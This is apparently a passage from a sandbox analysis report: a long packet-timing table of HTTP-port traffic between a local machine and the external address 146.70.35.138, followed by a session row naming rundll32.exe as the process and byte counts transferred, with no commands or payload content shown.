Apr 22, 2022 18:13:04.876041889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876075983 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876092911 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876117945 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876135111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876321077 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876427889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876496077 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876513004 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876523018 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876538038 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876563072 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876580000 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876596928 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876597881 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876631975 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876657963 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876682997 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876698971 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876723051 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876782894 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876800060 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876898050 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876919031 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.876945019 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.876972914 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.915833950 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915863991 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915879965 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915903091 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915918112 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.915951967 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.915993929 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916152954 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916178942 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916191101 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916208982 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916220903 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916330099 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916378021 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916404009 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916421890 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916435003 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916450977 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916479111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916496992 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916532993 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916542053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916569948 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916811943 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916836977 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916855097 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916872978 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.916933060 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.916965008 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.955667973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955715895 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955737114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955773115 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955807924 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.955838919 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.955889940 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.955897093 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956182003 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956242085 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956259966 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956260920 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956306934 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956309080 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956346989 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956363916 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956444025 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956638098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956690073 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956713915 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956724882 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956743002 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956772089 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956825018 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956825018 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956861973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956880093 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956907988 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956955910 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.956959963 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.956991911 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957006931 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.957040071 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957092047 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957097054 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.957129955 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957178116 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957209110 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.957283020 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.996402979 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996479988 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996520042 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996550083 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.996577024 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996582985 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.996617079 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.996645927 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.996684074 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997056961 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997112989 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997140884 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997148991 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997180939 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997200012 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997251987 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997262001 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997289896 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997320890 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997342110 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997391939 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997422934 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997430086 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997471094 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997488976 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997541904 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997565985 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997579098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997611046 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997632980 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997694016 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997703075 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997733116 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997756958 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997781992 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997843027 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997863054 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997883081 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997899055 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.997925043 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.997982979 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036662102 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036731958 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036763906 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036768913 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036793947 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036802053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036825895 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036850929 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036889076 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.036933899 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.036973953 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037004948 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037012100 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037019014 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037030935 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037071943 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037081003 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037100077 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037125111 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037138939 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037189007 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037211895 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037239075 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037266016 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037277937 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037319899 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037326097 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037358046 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037369013 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037451982 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037503958 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037518024 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037549973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037574053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037590981 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037630081 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037640095 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037658930 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037681103 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.037885904 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.037942886 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.076746941 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076801062 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076828957 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076869011 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076879025 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.076899052 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.076935053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.076950073 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077024937 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077094078 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077122927 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077168941 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077276945 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077296972 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077339888 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077366114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077368021 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077404976 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077428102 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077442884 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077470064 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077478886 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077538967 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077608109 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077673912 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077685118 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077704906 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077745914 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077747107 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077785969 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077805996 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077815056 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077853918 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077856064 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077891111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077905893 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.077919006 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077950001 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.077959061 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.078017950 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.116153955 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116202116 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116231918 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116271973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116275072 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.116301060 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.116305113 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.116360903 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117312908 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117353916 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117386103 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117398977 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117427111 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117441893 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:05.117470026 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:05.117500067 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49773 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 22, 2022 18:13:03.616503954 CEST | 653 | OUT | |
Apr 22, 2022 18:13:03.994354963 CEST | 654 | IN |